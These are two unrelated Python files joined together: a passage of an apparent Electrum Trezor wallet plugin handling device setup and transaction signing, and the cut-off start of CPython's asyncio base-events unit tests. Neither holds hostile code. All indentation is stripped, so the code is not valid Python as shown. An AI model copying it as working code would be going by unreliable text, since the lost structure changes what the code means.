minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 12, 0)
maximum_library = (0, 13)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
self._is_bridge_available = None
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def is_bridge_available(self) -> bool:
# Testing whether the Bridge is available can take several seconds
# (when it is not), as it is slow to timeout, hence we cache it.
if self._is_bridge_available is None:
try:
call_bridge("enumerate")
except Exception:
self._is_bridge_available = False
# never again try with Bridge due to slow timeout
BridgeTransport.ENABLED = False
else:
self._is_bridge_available = True
return self._is_bridge_available
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
if self.is_bridge_available():
devices = BridgeTransport.enumerate()
else:
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.").format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
backup_type=settings.backup_type,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RecoveryDeviceType.Matrix:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_trezor_input_script_type(txin.script_type)
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n = full_path
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
t.inputs = self.tx_inputs(tx)
t.bin_outputs = [
TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
for o in tx.outputs()
]
return t
|
test_base_events.py
|
"""Tests for base_events.py"""
import concurrent.futures
import errno
import math
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
from test.support import os_helper
from test.support import socket_helper
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
asyncio.set_event_loop_policy(None)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
if socket_helper.IPV6_ENABLED:
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = self.loop.create_future()
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_error(self):
executor = mock.Mock()
msg = 'executor must be ThreadPoolExecutor instance'
with self.assertRaisesRegex(TypeError, msg):
self.loop.set_default_executor(executor)
self.assertIsNone(self.loop._default_executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = loop.create_future()
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = self.loop.create_future()
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(SystemExit):
pass
async def foo(delay):
await asyncio.sleep(delay)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
with self.assertRaises(ShowStopper):
self.loop.run_until_complete(foo(0.1))
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
async def zero_error_coro():
await asyncio.sleep(0.01)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
